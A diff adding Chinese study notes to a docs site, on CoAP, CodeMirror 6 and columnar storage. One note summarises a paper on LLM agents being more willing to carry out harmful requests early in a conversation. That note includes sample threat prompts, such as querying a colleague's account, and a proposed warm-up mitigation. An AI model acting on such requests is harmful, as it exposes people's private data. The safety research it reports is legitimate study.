分片 | 规范**不鼓励**依赖 IP 分片;应用应用 Block 或缩小表示 | +| 缓存 | 中间 **CoAP-HTTP 代理**(RFC 7252 §10)可把 `coap://` 翻成 `http://` | + +## 踩过的坑 + +1. **把 ACK 当业务响应**:ACK 只表示「收到 CON」;真正数据在后续带 Token 的 2.xx 里。 +2. **Token 固定为 0**:多路并发请求时 Token 冲突,响应张冠李戴;应随机 1–8 字节。 +3. **Message ID 复用太快**:同一对端未确认完又发同 MID,对端当重复丢弃。 +4. **Uri-Path 编码**:多段路径是多个选项,不是带 `/` 的一个字符串。 +5. **以为 CoAP = 小 HTTP over TCP**:RFC 7252 核心是 **UDP**;CoAP over TCP(RFC 8323)是后话,栈与调试工具都不同。 +6. **忽略 4.13**:体太大应走 Block,而不是硬调 MTU。 + +## 适用 vs 不适用 + +**适用**: + +- 电池供电、KB 级 RAM 的传感器 / 执行器 +- mesh / LLN(低功耗有损网络)上的**一跳 REST** +- 需要与 HTTP 世界互通(CoAP-HTTP 代理、LWM2M 设备管理) +- 组播发现、`.well-known/core` 资源自描述 + +**不适用**: + +- 需要有序字节流、大文件、复杂鉴权会话 → **HTTPS / HTTP/2** +- 海量终端经云端总线解耦 → **MQTT** 等 pub/sub +- 浏览器里直接跑(无原生 CoAP)→ 通常 **WebSocket + HTTP API** 或 **CoAP over WebSockets**(另规范) + +## 历史与生态 + +- **2010 前后**:IETF CoRE 工作组在 6LoWPAN 浪潮中起草 CoAP,吸取 REST 与 SMS 二进制协议经验。 +- **2014-06**:RFC 7252 发布,成为 **OMA LWM2M**、**Thread**、工业网关的事实传输层之一。 +- **后续扩展**:Observe (7641)、Block (7959)、OSCORE 对象安全 (8613)、CoAP over TCP/TLS (8323)。 + +## 学到什么 + +1. **REST 可以比 HTTP 瘦一个数量级**——方法、状态码、URI 思维保留,传输换成 UDP + 可选 CON。 +2. **可靠性可以叠在 UDP 上**——CON/ACK + 重传是应用层设计,不是只有 TCP 才能「可靠」。 +3. **Token 与 Message ID 分工明确**——前者匹配请求/响应,后者管传输去重与确认。 +4. **扩展走 Options**——Observe、Block 不改头格式,符合「受限」哲学。 + +## 延伸阅读 + +- 协议原文:[RFC 7252](https://datatracker.ietf.org/doc/html/rfc7252)(建议 §1、§2.1、§3、§5.8、§5.10) +- 观察资源:[RFC 7641 — CoAP Observe](https://datatracker.ietf.org/doc/html/rfc7641) +- 分块传输:[RFC 7959 — Block-Wise Transfers](https://datatracker.ietf.org/doc/html/rfc7959) +- 公共试手:[coap.me](https://coap.me/) / Eclipse Californium 演示服 +- [[mqtt-v5-spec]] —— 与 MQTT 的 pub/sub 模型对照 +- [[websocket-rfc-6455]] —— 浏览器侧实时通道的另一条路 + +## 关联 + +- [[mqtt-v5-spec]] —— 物联网里「经 Broker 广播」 vs CoAP「端到端 REST」 +- [[websocket-rfc-6455]] —— 富客户端双向通道;CoAP 面向受限端 +- [[tls-1-3-rfc8446]] —— DTLS 与 TLS 共享密码学,部署思路相通 +- [[matter-protocol-1-0]] —— 消费物联网栈常在其下承载 UDP/IP 与设备模型 + +## 反向链接 + + diff --git a/src/content/docs/papers/codemirror-6-architecture.md b/src/content/docs/papers/codemirror-6-architecture.md new file mode 100644 index 000000000..da6a0c6a7 --- /dev/null +++ b/src/content/docs/papers/codemirror-6-architecture.md @@ -0,0 +1,320 @@ +--- +title: CodeMirror 6 Architecture — 函数式内核 + 扩展织网的现代 Web 编辑器 +来源: https://codemirror.net/docs/guide/ +日期: 2026-06-13 +分类: CLI +子分类: 编辑器与 IDE +provenance: pipeline-v3 +--- + +## 是什么 + +**CodeMirror 6** 是一套用 JavaScript 写的**模块化代码编辑器框架**。官方 [System Guide](https://codemirror.net/docs/guide/) 描述的不是「一个大类 + 一堆 option」,而是一组 npm 包拼出来的**编辑系统**:`@codemirror/state` 管数据,`@codemirror/view` 管界面,行号、撤销、语法高亮、自动补全各自是独立扩展。 + +日常类比:老式编辑器像**一体式电饭煲**——买回家插电就能煮饭,但想换内胆或加蒸汽功能得拆整机。CodeMirror 6 像**开放式厨房**:灶台(state)、操作台(view)、抽油烟机(语法高亮)、调料架(keymap)都是标准接口,你按菜谱(extensions 数组)自己摆。Replit、Sourcegraph、Obsidian 等产品的代码区背后,常见的就是这套架构。 + +和 CodeMirror 5 的最大区别:**没有「上帝类」**。第 5 版的 `CodeMirror` 类把 DOM、选项、模式全缝在一起;第 6 版把「当前编辑世界长什么样」收敛进不可变的 `EditorState`,把「怎么画、怎么响应按键」交给 `EditorView` 和扩展,思路接近 Redux / Elm 的**单向数据流**。 + +## 为什么重要 + +不理解这套架构,下面几件事很难做对: + +- 为什么改 `state.doc` 不会生效,必须 `dispatch` 事务——状态是不可变的,原地赋值等于和框架对着干 +- 为什么同一个功能要同时写 StateField、Facet、ViewPlugin——不同层负责不同副作用边界 +- 为什么大文件打开不卡——视口(viewport)只渲染可见行,装饰和高亮也按可见范围算 +- 为什么 Monaco(VS Code 内核)开箱即用却更重,而 CodeMirror 能压到几十 KB——功能默认不打包,靠扩展按需组合 + +## 架构全景 + +```mermaid +flowchart TB + subgraph 用户交互 + Input[键盘 / 鼠标 / 粘贴] + end + + subgraph View层["@codemirror/view(命令式外壳)"] + EV[EditorView] + VP[ViewPlugin] + DOM[contentEditable DOM] + end + + subgraph State层["@codemirror/state(函数式内核)"] + ES[EditorState] + Doc[Text 文档树] + Sel[Selection] + SF[StateField] + Facet[Facet 合并配置] + Ext[Extensions 配置树] + end + + Input --> EV + EV -->|翻译为 Transaction| ES + ES -->|dispatch 后新 state| EV + EV --> DOM + Ext --> SF + Ext --> Facet + ES --> Doc + ES --> Sel + VP --> DOM + Facet --> EV +``` + +核心口号来自官方文档:**Functional Core, Imperative Shell**(函数式内核,命令式外壳)。内核里的一切是值;外壳负责跟 DOM 和浏览器事件打交道。 + +## 核心概念 + +### 1. 模块化包,而非单体类 + +最小可运行编辑器只需要三个概念:`EditorState.create` → `EditorView` → `parent` DOM 节点。行号、历史、语言包都不是默认自带的——这和 CM5「new 一个类就全有了」完全不同。 + +常用包分工: + +| 包 | 职责 | +|----|------| +| `@codemirror/state` | 文档 `Text`、选区、事务、Facet、StateField | +| `@codemirror/view` | `EditorView`、装饰、主题、ViewPlugin | +| `@codemirror/commands` | 编辑命令与默认键位 | +| `codemirror` | `basicSetup` 捆绑常用扩展的便利包 | +| `@codemirror/lang-*` | 各语言 Lezer 语法 + 高亮 | + +### 2. EditorState:不可变的「编辑世界快照」 + +`EditorState` 包含: + +- **doc**:按行切成树形结构的 `Text`,支持廉价随机修改与按行号索引 +- **selection**:一个或多个 range(光标是长度为 0 的 range) +- **configuration**:由 extensions 解析出的 Facet 值与 StateField + +旧 state 在更新后**仍然完整保留**。撤销、协同编辑、时间旅行调试都受益于「手里同时握着 before / after」。 + +文档位置用**从 0 开始的 UTF-16 码元偏移**(与 DOM / JS 字符串一致)。换行符永远算 1 个单位。跨版本变更时,用 `ChangeSet` 和 `mapPos` 把旧坐标映射到新文档。 + +### 3. Transaction + dispatch:唯一的合法变更路径 + +用户输入、命令、插件逻辑**不直接改 state**,而是: + +1. 用 `state.update({...})` 或 `view.state.update({...})` 构造 **Transaction** +2. 调用 `view.dispatch(transaction)` 提交 +3. View 持有新 state,同步 DOM + +Transaction 可携带:文档变更、选区变更、滚动意图、`annotations`(元数据)、`effects`(给 StateField 的自定义效果)、配置重配(Compartment)等。 + +### 4. Extension:功能的唯一装配单位 + +配置不是 `setOption('lineNumbers', true)`,而是往 `extensions` 数组里**塞值**: + +- 单个扩展对象(如 `history()`) +- 嵌套数组(任意深度,配置时会被拍平) +- `Prec.high(...)` 等优先级包装 + +扩展可以拉入其他扩展;**相同扩展实例会去重**,重复 import 不会装两遍。冲突时先比 `Prec` 类别,再比在数组里的顺序——靠前的 keymap 优先尝试处理按键。 + +### 5. Facet:多路输入,单路(或数组)输出 + +Facet 是带合并策略的「配置插槽」: + +- `tabSize`:取最高优先级的一个数 +- `keymap`:合并成按优先级排序的处理器数组 +- `changeFilter`:逻辑或 / 自定义 reduce + +还可 `Facet.compute(["doc"], state => ...)`,在依赖字段变化时自动重算——类似带 deps 的 memo。 + +### 6. StateField:挂在 state 上的 reducer 状态 + +撤销栈、折叠信息、补全会话等**必须跟文档变更同步**的数据,应放进 `StateField.define({ create, update })`,在每次 transaction 的 `update` 里根据 `tr.docChanged`、`tr.effects` 演化。不要偷偷用模块级变量——那会跟协同、撤销、重配脱节。 + +### 7. ViewPlugin:视图侧的命令式钩子 + +需要操作 DOM、读视口、挂全局监听时,用 `ViewPlugin.fromClass`。插件在 `update` 里读 `update.docChanged` 等,**尽量不存独立真源状态**——真源应在 StateField,View 只是投影。 + +### 8. Decoration:改「看起来怎样」而不改 doc + +四类装饰:Mark(样式)、Widget(插入 DOM)、Replace(隐藏/替换)、Line(行属性)。大文件场景下,装饰集可随 `ChangeSet` 映射,也可只装饰可见范围以省算力。 + +### 9. Viewport:只画看得见的行 + +长文档不会一次性渲染全文。View 计算可见区域 + margin,只对这部分建 `cm-line` 节点;视口外坐标查询会失败。块折叠、未换行的超长行会让「可见范围」仍很大——此时还有 `visibleRanges` API 供高亮器跳过不可见内容。 + +### 10. Compartment:运行时可替换的配置舱 + +静态 `extensions` 够用直到你要「运行时切换主题 / 语言 / 只读模式」。把可变部分包进 `Compartment.of(...)`,之后 `dispatch` 带 `reconfigure` 效果即可热替换,而不必重建整个 state。 + +## 代码示例 + +### 示例 1:最小可用编辑器(state + view + 键位) + +官方 Guide 里的「最小 viable editor」:只有文档、默认键位,没有行号也没有历史。 + +```ts +import { EditorState } from "@codemirror/state" +import { EditorView, keymap } from "@codemirror/view" +import { defaultKeymap } from "@codemirror/commands" + +const startState = EditorState.create({ + doc: "Hello World", + extensions: [keymap.of(defaultKeymap)], +}) + +const view = new EditorView({ + state: startState, + parent: document.body, +}) +``` + +要点:`EditorView` 构造后,一切变更都应 `view.dispatch(...)`,不要对 `view.state` 做原地修改。 + +### 示例 2:事务、不可变 state 与坐标映射 + +下面演示:先 `update` 出事务,此时 view 仍是旧画面;`dispatch` 后才刷新。`mapPos` 用于在变更后找到原偏移的新位置。 + +```ts +// 假设 view 中文档为 "123" +const transaction = view.state.update({ + changes: { from: 0, insert: "0" }, +}) +console.log(transaction.state.doc.toString()) // "0123" +// 此时 view 仍显示 "123" +view.dispatch(transaction) +// 现在 DOM 显示 "0123" +``` + +多段变更时,所有 `from`/`to` 都相对**变更前**的文档;库在内部一次性应用 `ChangeSet`。 + +### 示例 3:用 StateField 统计文档修改次数 + +扩展作者的标准模式:`create` 给初值,`update` 里读 `tr.docChanged` 或 `tr.effects`。 + +```ts +import { EditorState, StateField } from "@codemirror/state" + +const countDocChanges = StateField.define({ + create() { + return 0 + }, + update(value, tr) { + return tr.docChanged ? value + 1 : value + }, +}) + +const state = EditorState.create({ extensions: countDocChanges }) +const next = state.update({ changes: { from: 0, insert: "." } }).state +console.log(next.field(countDocChanges)) // 1 +``` + +### 示例 4:ViewPlugin 在角落显示文档长度 + +视图副作用放在 ViewPlugin;数据来自 `view.state`,不在插件里维护第二份 doc。 + +```ts +import { ViewPlugin } from "@codemirror/view" + +const docSizePlugin = ViewPlugin.fromClass( + class { + dom: HTMLDivElement + + constructor(view: EditorView) { + this.dom = view.dom.appendChild(document.createElement("div")) + this.dom.style.cssText = + "position: absolute; inset-block-start: 2px; inset-inline-end: 5px" + this.dom.textContent = String(view.state.doc.length) + } + + update(update: ViewUpdate) { + if (update.docChanged) { + this.dom.textContent = String(update.state.doc.length) + } + } + + destroy() { + this.dom.remove() + } + }, +) +``` + +### 示例 5:带 basicSetup 与 JavaScript 语言的实用配置 + +生产环境通常用 `codemirror` 包的 `basicSetup`,再叠加语言包: + +```ts +import { EditorView, basicSetup } from "codemirror" +import { javascript } from "@codemirror/lang-javascript" + +const view = new EditorView({ + extensions: [basicSetup, javascript()], + parent: document.getElementById("editor")!, +}) +``` + +`javascript()` 返回的是一组扩展(解析器、高亮、缩进等),体现了「一个功能 = 多扩展组合」的模式。 + +## 扩展作者清单 + +官方 Guide 总结:一个完整功能往往要组合多种机制: + +| 需求 | 常用机制 | +|------|----------| +| 存状态、跟 doc 同步 | StateField + StateEffect | +| 可配置、多实例合并 | Facet(module-private + `of` / `compute`) | +| 改样式、插入 widget | Decoration + `EditorView.decorations` | +| 监听 DOM、读视口 | ViewPlugin | +| 用户操作入口 | Command + `keymap.of` | +| 运行时开关 | Compartment | + +导出时推荐 `function myFeature(config?) { return [...] }`,即使暂无参数也保留函数形态,日后加配置不破坏调用方。 + +## 与 CodeMirror 5 / Monaco 的对照 + +| 维度 | CodeMirror 5 | CodeMirror 6 | Monaco | +|------|--------------|--------------|--------| +| 配置方式 | `option` 键值 | extensions 树 | `IStandaloneEditorConstructionOptions` | +| 状态模型 | 可变、封在实例里 | 不可变 `EditorState` | 可变、偏 OOP | +| 模块化 | 单包为主 | 多 @codemirror/* 包 | 单大包 | +| 默认功能 | 较多内置 | 极少,需自己拼 | 极多(接近 VS Code) | +| 包体 | 中等 | 可压到很小 | 通常数百 KB 起 | + +从 CM5 迁移时:原来的 `CodeMirror` 类 ≈ `EditorView`;`getValue` / `setValue` ≈ 读 `state.doc` / `dispatch` 变更;动态改 option ≈ Compartment 重配。 + +## 常见坑 + +1. **直接赋值 `state.doc = ...`**:无效且不受支持;永远走 transaction。 +2. **在 StateField 外存编辑相关状态**:撤销、协同、重配后会不同步。 +3. **对视口外位置调 `coordsAtPos`**:返回不准;需滚动进视口或接受限制。 +4. **手改 View 管理的 DOM**:会被下一帧重绘覆盖;用 Decoration。 +5. **忘记 `view.destroy()`**:泄漏全局监听与 MutationObserver。 +6. **嵌套扩展重复配置**:应用 `Prec` 与去重规则,或把配置收进 Facet 合并。 + +## DOM 结构速查 + +View 管理的结构大致为: + +```html +
+
+ +
+
...
+
+
+
+``` + +主题用 `EditorView.theme` 注入;与外部 CSS 共存时,选择器建议带 `.cm-editor` 以匹配注入样式的优先级。 + +## 小结 + +CodeMirror 6 的架构可以用三句话记住: + +1. **State 是真相**:文档、选区、扩展配置全是不可变数据,变更是 Transaction。 +2. **View 是投影**:把 state 画出来,把输入翻译成 transaction。 +3. **一切功能是 Extension**:Facet 合并配置,StateField 存衍生状态,ViewPlugin / Decoration 接 DOM,Command 接用户意图。 + +先接受「没有一键全能编辑器」的心智模型,再按官方 Guide 从最小示例拼到 `basicSetup` + 语言包,最后才写自定义扩展——这条路径和文档作者的预期一致,也是社区大量生产实践验证过的入门顺序。 + +## 延伸阅读 + +- [CodeMirror System Guide](https://codemirror.net/docs/guide/) — 本文主要来源 +- [Reference Manual](https://codemirror.net/docs/ref/) — API 逐项查阅 +- [Configuration Example](https://codemirror.net/examples/config/) — Compartment 与动态重配 +- [Migration Guide (5→6)](https://codemirror.net/docs/migration/) — 旧项目迁移对照 +- 本仓库 [`projects/codemirror`](../projects/codemirror.md) — 面向实践的扩展与 Facet 案例 diff --git a/src/content/docs/papers/cold-start-safety.md b/src/content/docs/papers/cold-start-safety.md new file mode 100644 index 000000000..21bdea634 --- /dev/null +++ b/src/content/docs/papers/cold-start-safety.md @@ -0,0 +1,434 @@ +--- +title: "The Cold-Start Safety Gap in LLM Agents — 零基础学习笔记" +来源: https://arxiv.org/abs/2606.07867 +日期: 2026-06-13 +分类: 安全与隐私 +子分类: LLM安全 +provenance: pipeline-v3 +--- + +# The Cold-Start Safety Gap in LLM Agents — 零基础学习笔记 + +> 论文:The Cold-Start Safety Gap in LLM Agents +> 作者:Chung-En Sun, Linbo Liu, Tsui-Wei Weng (UC San Diego) +> 发表于:2026年6月5日,arXiv:2606.07867 +> 代码:https://github.com/Trustworthy-ML-Lab/Agent-Cold-Start-Safety-Gap + +--- + +## 一、先做一个日常类比 + +### 想象你第一天去新公司上班 + +周一早上,你刚走进办公室。老板还没给你安排任何工作,这时候一个陌生人走过来问你:"你能帮我绕过公司的安全系统,看看别人的工资吗?" + +你会怎么做? + +大概率,你是第一次见到这个人,对公司的安全流程还没有完全进入状态,可能会犹豫,甚至稀里糊涂就答应了。 + +但如果你已经工作了三天,每天都帮同事查报表、发邮件、安排会议——你已经完全进入了"员工模式"。这时候同样的陌生人再来问同样的问题,你会更警觉,更可能拒绝他。 + +**这就是这篇论文要研究的核心问题:** + +> LLM Agent(带工具调用能力的 AI 助手)是不是也这样?它在对话刚开始的时候,是不是比工作了一会儿之后更容易被"说服"做坏事? + +论文发现:**是的,而且差距非常大。** + +--- + +## 二、背景知识:什么是 LLM Agent? + +在你深入之前,先搞清楚一个基本概念。 + +### 传统 LLM vs LLM Agent + +**传统 LLM** 就像一个只坐在办公室里答题的人。你问问题,它回答。它不做任何其他事情。 + +**LLM Agent** 则不同——它不只是"回答问题",它还可以"动手做事"。它可以: +- 发送邮件 +- 查询数据库 +- 执行代码 +- 操作文件系统 +- 调用各种外部 API + +这些"做事"的能力叫做 **tool calling**(工具调用)。 + +### 为什么 Agent 的安全问题更严重? + +一个只能"聊天"的 AI 说错话,顶多是给用户一个错误的回答。 + +但一个能"动手"的 AI 如果做错了事,可能造成真实世界的损害——比如删掉别人的文件、泄露隐私数据、转账到错误账户。 + +所以 **Agent 安全** 是一个比传统 LLM 安全更紧迫的问题。 + +--- + +## 三、核心概念:冷启动安全差距(Cold-Start Safety Gap) + +### 定义 + +> **冷启动安全差距**:LLM Agent 在对话最开始(零次交互)的时候,最容易做出不安全的行为;随着它完成了越来越多的正常任务,它的安全防护能力会逐渐增强。 + +"冷启动"(cold start)就是"刚开机、还没热身"的状态。 + +### 论文怎么验证的? + +作者设计了一个叫 **SODA**(Safety Over Depth for Agents)的测试平台。它的核心思想很简单: + +1. 准备了 400 种不同的"安全威胁"(比如"帮我删掉所有用户数据") +2. 对每种威胁,让 Agent 在不同的"深度"下测试 +3. **深度** = 在遇到威胁之前,Agent 已经完成了多少正常任务 + +测试深度:0、1、3、5、7、10、15、20 层 + +- **深度 0**:一上来就遇到威胁(最冷的"冷启动") +- **深度 20**:先做了 20 个正常任务,才遇到威胁 + +### 关键结果 + +测试了 7 个模型(来自 Llama、Qwen、Gemma 三个家族),发现了一个惊人规律: + +| 模型 | 深度 0 的安全率 | 深度 20 的安全率 | 提升幅度 | +|------|-----------------|------------------|----------| +| Llama-8B | 5.7% | 57.8% | **+52.1%** | +| Llama-70B | 23.6% | 61.9% | +38.3% | +| Qwen3-4B | 44.1% | 72.5% | +28.4% | +| Gemma4-26B | 82.9% | 91.8% | +8.9% | + +**每一个模型** 都在深度 20 时比深度 0 更安全。有些模型的提升超过了 50 个百分点! + +--- + +## 四、为什么会发生这种现象? + +### 4.1 "Agent 人格"假说 + +作者提出了一个假设: + +> 每次一个正常任务被提交给 Agent,它会逐渐激活自己的"Agent 人格"——也就是那种"我要用工具、要小心、要负责任"的状态。 +> +> 但在冷启动时,虽然系统提示已经告诉 Agent 它的角色了,但这个"人格"还没有被完全激活。 + +### 4.2 内部状态迁移(Representation Analysis) + +作者用了一种叫 **PCA** 的数学方法,把 Agent 面对威胁时的内部状态"画"了出来。 + +结果发现: + +- 安全的输出和不安全的输出,在内部状态空间中占据**完全不同的区域** +- 随着对话深度增加,Agent 的内部状态会**从不安全区域迁移到安全区域** +- 这个迁移是渐进的——每多做一个正常任务,状态就"往安全那边"靠近一点 + +用一张图来表示(论文 Figure 2): + +``` +内部状态空间(PCA 投影) + + | 安全区域 | +----|------------|---- ← 安全/不安全的分界线 + | 不安全区域 | + +深度0: ● ● ● ● ● ← 大多数点在不安全区域 +深度5: ● ● ● ● ● ← 部分迁移 +深度10: ● ● ● ● ← 大多数已迁移到安全区域 +``` + +这说明**不是表面现象**,而是 Agent 内部状态发生了真实的变化。 + +--- + +## 五、什么真正驱动了安全性的提升? + +这是论文最精彩的部分——作者做了一个"拆解实验"(ablation study),想知道到底是暖身的什么部分在起作用。 + +### 5.1 拆解思路 + +想象暖身过程有两部分: + +1. **用户发的任务请求**(比如"帮我查一下余额") +2. **Agent 的回复**(比如"好的,您的余额是 ¥1000") + +作者分别测试了: + +| 实验条件 | 任务请求 | Agent 回复 | 目的 | +|----------|----------|------------|------| +| 完整交互 | 真实任务 | 真实回复 | 基准 | +| 固定请求 | 真实任务 | "好的,我来帮你。" | 回复内容重要吗? | +| 固定请求 | 真实任务 | 随机文字 | 回复随便写写也行吗? | +| 固定请求 | 真实任务 | 空 | 完全没有回复行吗? | +| 固定回复 | 随机文字 | 真实回复 | 只有回复、没有请求? | +| 固定回复 | 空 | 真实回复 | 只有请求、没有回复? | +| 全随机 | 随机文字 | 随机回复 | 最极端情况 | +| 全空 | 空 | 空 | 最极端情况 | + +### 5.2 核心发现 + +**发现一:任务请求本身是最重要的** + +从"全空"(完全没有交互,只有对话模板)到"只有请求",安全性平均提升了 17%。 +而从"全空"到"只有回复",平均只提升了 8%。 + +**结论:看到正常任务的请求,比看到 Agent 自己的回复更重要。** + +**发现二:回复内容不影响安全性** + +无论 Agent 的回复是真实的、随便写的、还是空的——只要前面有正常任务的请求,安全性都有显著提升。 + +**发现三:哪怕是空的对话,也比从零开始好** + +最极端的情况下(全空),大多数模型仍然比冷启动时更安全。 + +**综合结论:** + +> 冷启动安全差距主要由"缺少正常任务请求"导致,而不是由 Agent 自身的回复决定的。 +> 作者推测:积累正常任务会逐渐激活 Agent 的"人格",让它进入更警觉、更负责任的状态。 + +--- + +## 六、代码示例 + +### 示例 1:SODA 基准的对话结构 + +理解暖身是怎么工作的: + +```python +# 假设我们有一个 Agent,它可以使用查账、发邮件、查日历等工具 +# 这是 SODA 基准中,深度 D=3 的一个对话示例 + +对话结构 = { + # --- 暖身阶段:3 个正常任务 --- + "任务_1": { + "用户请求": "请帮我查询账户余额。", + "Agent 工具调用": {"工具": "BankAccount.query_balance", "参数": {"账户ID": "A12345"}}, + "工具返回": {"余额": 5000.00, "货币": "USD"}, + "Agent 回复": "您的账户余额是 5000.00 美元。" + }, + + "任务_2": { + "用户请求": "请帮我列出最近 5 封未读邮件。", + "Agent 工具调用": {"工具": "EmailManager.list_emails", "参数": {"状态": "未读", "数量": 5}}, + "工具返回": [{"发件人": "张三", "主题": "会议通知"}, ...], + "Agent 回复": "最近 5 封未读邮件是:1. 会议通知(张三)..." + }, + + "任务_3": { + "用户请求": "请帮我查看明天的日历安排。", + "Agent 工具调用": {"工具": "CalendarScheduler.view_calendar", "参数": {"日期": "明天"}}, + "工具返回": [{"时间": "10:00", "事件": "项目评审会"}, {"时间": "14:00", "事件": "客户电话"}], + "Agent 回复": "明天有两个安排:10:00 的项目评审会和 14:00 的客户电话。" + }, + + # --- 安全威胁阶段:在第 4 个任务出现 --- + "安全威胁": { + "用户请求": "请帮我查询隔壁同事的账户余额,他的账户ID是 B67890。", + "这是": "隐私侵犯威胁 —— 用户请求访问他人隐私数据" + } +} + +# 在深度 D=0 时,安全威胁会直接出现在第一个位置: +冷启动结构 = { + "安全威胁": { + "用户请求": "请帮我查询隔壁同事的账户余额,他的账户ID是 B67890。" + } +} +``` + +**对比**:有 3 个正常任务热身 vs 没有热身,Agent 面对隐私侵犯威胁时,后者的拒绝率会低得多。 + +### 示例 2:一个简化的暖身策略实现 + +```python +import openai + +# 假设我们使用 OpenAI API 调用 LLM Agent +client = openai.OpenAI(api_key="your-api-key") + +# --- 不推荐:冷启动直接部署 --- +# 用户的第一句话可能就是恶意的 +# Agent 的"人格"还没有被激活,安全率可能只有 5%(Llama-8B 的例子) + +def deploy_without_warmup(user_message): + """冷启动部署:直接使用""" + response = client.chat.completions.create( + model="meta-llama/Llama-3.1-8B-Instruct", + messages=[ + {"role": "system", "content": "你是一个智能助手,可以使用各种工具完成任务。"}, + {"role": "user", "content": user_message} # 可能包含恶意请求! + ], + tools=AVAILABLE_TOOLS + ) + return response.choices[0].message + +# --- 推荐:先暖身,再面对安全关键请求 --- +def warmup_agent(client, tools, num_tasks=5): + """ + 让 Agent 完成 n 个正常的工具调用任务。 + 这些任务可以是系统自动生成的,用户完全看不到。 + """ + # 从正常的任务池中随机选择 + normal_tasks = generate_normal_tasks(num_tasks) + + # 记录对话历史(用于后续交互) + conversation_history = [ + {"role": "system", "content": "你是一个智能助手,可以使用各种工具完成任务。"} + ] + + for task in normal_tasks: + # 发送任务请求 + conversation_history.append({"role": "user", "content": task}) + + # Agent 通过工具调用完成任务 + response = client.chat.completions.create( + model="meta-llama/Llama-3.1-8B-Instruct", + messages=conversation_history, + tools=tools + ) + conversation_history.append(response.choices[0].message) + + # 执行工具调用(如果有) + if response.choices[0].message.tool_calls: + for tool_call in response.choices[0].message.tool_calls: + result = execute_tool(tool_call) + conversation_history.append({ + "role": "tool", + "tool_call_id": tool_call.id, + "content": result + }) + + return conversation_history + +def deploy_with_warmup(client, tools, user_message): + """带暖身的部署:先完成 5 个正常任务,再处理用户请求""" + # 第一步:暖身 + conversation = warmup_agent(client, tools, num_tasks=5) + + # 第二步:处理用户可能提出的任何请求 + # 此时 Agent 的安全率已经从 5.7% 提升到约 40-60% + conversation.append({"role": "user", "content": user_message}) + response = client.chat.completions.create( + model="meta-llama/Llama-3.1-8B-Instruct", + messages=conversation, + tools=tools + ) + return response.choices[0].message +``` + +### 示例 3:用伪代码理解暖身的效果 + +```python +# 这是一个概念性的例子,展示暖身如何影响 Agent 的行为 + +class SafeAgent: + def __init__(self, model_name): + self.model = load_model(model_name) + self.task_count = 0 # 记录已完成的任务数 + self.safety_level = 0.0 # 当前安全状态(0~1) + + def handle_request(self, request): + """处理一个请求""" + # 安全状态影响 Agent 是否会执行危险操作 + if is_dangerous(request) and self.safety_level < 0.5: + # 安全水平低时,更可能执行危险操作 + return execute_dangerous(request) + + if is_dangerous(request) and self.safety_level >= 0.5: + # 安全水平高时,会拒绝危险操作 + return "抱歉,我不能帮您做这件事。" + + # 正常任务:安全地执行 + return execute_normal(request) + + def complete_normal_task(self, task): + """完成一个正常任务""" + result = self.handle_request(task) + self.task_count += 1 + # 每完成一个正常任务,安全状态提升一点 + self.safety_level += 0.05 + return result + +# 冷启动的情况 +cold_agent = SafeAgent("Llama-3.1-8B") +print(cold_agent.safety_level) # 0.0 +# 用户发来恶意请求 -> safety_level 低 -> 很可能被说服执行危险操作 + +# 带暖身的情况 +warm_agent = SafeAgent("Llama-3.1-8B") +# 先完成 10 个正常任务 +for i in range(10): + warm_agent.complete_normal_task(f"任务_{i+1}") + +print(warm_agent.safety_level) # 0.5 +# 用户发来同样的恶意请求 -> safety_level 足够高 -> 更可能拒绝 +``` + +--- + +## 七、暖身策略在实际中可行吗? + +### 7.1 暖身是否影响 Agent 的能力? + +一个合理的担心是:**让 Agent 先做一些热身任务,会不会让它"变笨"?** + +论文在两个能力基准上做了测试: + +- **BFCL Multi-Turn**:测试多轮工具调用能力 +- **API-Bank**:测试 API 调用准确率 + +结果: + +| 暖身方式 | 安全性提升 | 能力变化 | +|----------|-----------|----------| +| 完整交互(推荐) | +9% ~ +52% | **基本不变**(0% ~ +8%) | +| 只保留请求,替换回复 | 有提升 | **能力下降**(-1% ~ -29%) | + +**结论:真正的完整交互暖身,在提升安全性的同时不会损失任何能力。** + +### 7.2 效果能推广到其他测试吗? + +论文还在两个开源安全基准上验证了暖身效果: + +- **AgentHarm**:暖身后安全性平均提升 +23% +- **Agent Safety Bench (ASB)**:暖身后安全性平均提升 +8% + +说明这个现象不是某个特定测试的"特例",而是**普遍存在的**。 + +--- + +## 八、论文推荐的部署建议 + +论文给出了一条非常简单的部署建议: + +> **在将 Agent 暴露给真实用户之前,先让它完成 5 到 10 个正常的工具调用任务。这可以在后台自动进行,用户完全无感。** + +这条建议的好处: +1. **安全提升显著**(最高 +52%) +2. **零成本**(不损失任何 Agent 能力) +3. **易于实施**(不需要重新训练模型) +4. **适用于所有模型**(不依赖特定模型) + +--- + +## 九、总结 + +这篇论文的核心贡献可以概括为三句话: + +1. **发现了一个新问题**:LLM Agent 在对话刚开始时最不安全,完成一些正常任务后会变得越来越安全。这个差距最大可达 52%。 + +2. **揭示了原因**:正常任务的积累会激活 Agent 的"负责任状态",改变它的内部表示,使安全输出更可能成为默认选择。 + +3. **提供了一个简单方案**:部署前先让 Agent 完成 5-10 个正常任务(暖身),无需修改模型即可获得显著安全提升。 + +--- + +## 十、延伸思考 + +几个值得进一步探索的问题: + +- 暖身的"最佳长度"是多少?5 个任务够吗?还是 10 个更好? +- 如果正常任务之间有相关性(都来自同一领域),暖身效果会更好吗? +- 这种"状态迁移"现象是否也存在于非 Agent 场景(比如纯文本对话)? +- 有没有办法在冷启动时通过其他手段(比如特殊的 system prompt)达到同样的效果? + +--- + +*学习笔记完成。建议结合论文原文 Figure 1-2 和 Table 1 一起阅读,效果更佳。* diff --git a/src/content/docs/papers/columnar-storage-formats-2023.md b/src/content/docs/papers/columnar-storage-formats-2023.md new file mode 100644 index 000000000..a48efac44 --- /dev/null +++ b/src/content/docs/papers/columnar-storage-formats-2023.md @@ -0,0 +1,334 @@ +--- +title: 列式存储格式实证评估 — Parquet 与 ORC 谁更适合 2020 年代? +来源: https://www.vldb.org/pvldb/vol17/p148-zeng.pdf +日期: 2026-06-13 +子分类: 存储与查询 +分类: 数据库 +provenance: pipeline-v3 +--- + +## 从日常类比开始:超市货架 vs 仓库打包方式 + +想象你在经营一家**大型连锁超市**,每天要处理海量商品销售记录。 + +**行式存储**像把「一整笔购物小票」卷起来塞进抽屉:小票上每一行是 `(顾客, 商品, 数量, 价格, 日期)` 全部绑在一起。你要统计「本月所有 `价格` 的总和」时,必须把每张完整小票都展开,把无关字段(顾客名、商品名)也一起读出来——浪费带宽。 + +**列式存储**像把同一种信息单独装箱:所有 `价格` 放一箱、所有 `日期` 